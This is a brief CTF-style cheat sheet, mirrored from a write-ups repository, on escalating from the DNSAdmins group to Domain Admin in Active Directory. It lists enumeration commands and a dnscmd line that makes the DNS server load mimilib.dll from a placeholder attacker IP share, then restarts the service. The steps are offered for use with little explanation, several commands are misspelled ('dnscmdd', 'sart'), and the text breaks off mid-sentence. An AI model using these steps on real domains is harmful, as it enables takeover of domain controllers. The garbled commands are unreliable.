mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 21:30:17 +00:00
759 B
759 B
Domain Enumeration - DNSAdmins
Members of DNSAdmins
could load arbitary DLL with the privileges of dns.exe , if Domain Controller (DC) servers as DNS , we can perform escalation to Domain Admins (DA)
Powerview
Enumerate members of DNSAdmins group
Get-NetGroupMember -GroupName "DNSAdmins"
AD Module
Enumerate members of DNSAdmins group
Get-ADGroupMember -Identity DNSAdmins
Configure DLL using dnscmd.exe
dnscmdd dc-name or 127.0.0.1 /config /serverlevelplugindll \\your_attacker_ip\dll\mimilib.dll
Restart dns service
sc.exe stop dns
sc.exe sart dns
Or alternatively follow this